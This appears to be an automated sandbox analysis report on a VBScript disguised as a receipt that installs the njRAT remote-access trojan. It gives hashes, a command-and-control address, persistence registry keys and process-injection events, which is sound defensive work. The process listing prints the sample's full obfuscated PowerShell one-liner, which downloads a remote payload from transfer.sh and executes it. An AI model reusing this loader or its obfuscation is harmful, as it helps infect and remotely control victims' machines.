Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-09-2021 14:32
Static task
static1
Behavioral task
behavioral1
Sample
Receipt_12203.vbs
Resource
win7-en
Behavioral task
behavioral2
Sample
Receipt_12203.vbs
Resource
win10v20210408
General
-
Target
Receipt_12203.vbs
-
Size
1KB
-
MD5
aa2957c1912b583d18c3fad0a1dbe455
-
SHA1
4b2ae1f0381d72b3833ab341cc3862b540359c64
-
SHA256
2f70c208c08b5607dda4932a3d29625a52d84aa66c916ce8a867a0c2c57ffc5b
-
SHA512
668b3c2be0f926e314bd5b810f79d0b7eac4fcd760108629cfff334c5f5dc0d66ea95f5d04fd47d09b4d910d1dfda1b1a405c008b3be24f420a4155371113a7a
Malware Config
Extracted
http://transfer.sh/get/dIj4XJ/bypass.txt
Extracted
njrat
v4.0
DAV008
51.103.75.40:53011
Windows
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 1684 powershell.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
aspnet_compiler.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" aspnet_compiler.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1684 set thread context of 2200 1684 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1684 powershell.exe 1684 powershell.exe 1684 powershell.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1684 powershell.exe Token: SeDebugPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe Token: 33 2200 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 2200 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 568 wrote to memory of 1684 568 WScript.exe powershell.exe PID 568 wrote to memory of 1684 568 WScript.exe powershell.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe PID 1684 wrote to memory of 2200 1684 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Receipt_12203.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://transferXXXsh/get/dIj4XJ/bypassXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1684-114-0x0000000000000000-mapping.dmp
-
memory/1684-119-0x0000018B28EC0000-0x0000018B28EC1000-memory.dmpFilesize
4KB
-
memory/1684-123-0x0000018B41F90000-0x0000018B41F91000-memory.dmpFilesize
4KB
-
memory/1684-124-0x0000018B28EB0000-0x0000018B28EB2000-memory.dmpFilesize
8KB
-
memory/1684-125-0x0000018B28EB3000-0x0000018B28EB5000-memory.dmpFilesize
8KB
-
memory/1684-130-0x0000018B28EB6000-0x0000018B28EB8000-memory.dmpFilesize
8KB
-
memory/1684-141-0x0000018B28EB8000-0x0000018B28EB9000-memory.dmpFilesize
4KB
-
memory/1684-152-0x0000018B41F50000-0x0000018B41F54000-memory.dmpFilesize
16KB
-
memory/2200-153-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/2200-154-0x000000000040836E-mapping.dmp
-
memory/2200-162-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB
-
memory/2200-163-0x0000000005900000-0x0000000005901000-memory.dmpFilesize
4KB
-
memory/2200-164-0x00000000053F0000-0x00000000053F1000-memory.dmpFilesize
4KB
-
memory/2200-165-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/2200-166-0x00000000053A0000-0x00000000053A1000-memory.dmpFilesize
4KB
-
memory/2200-167-0x00000000055D0000-0x00000000055D1000-memory.dmpFilesize
4KB